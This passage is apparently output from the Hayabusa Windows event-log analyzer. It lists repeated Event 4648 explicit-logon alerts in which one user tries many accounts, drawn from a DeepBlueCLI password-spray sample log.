+2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett 
| IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: 
lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 
04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: 
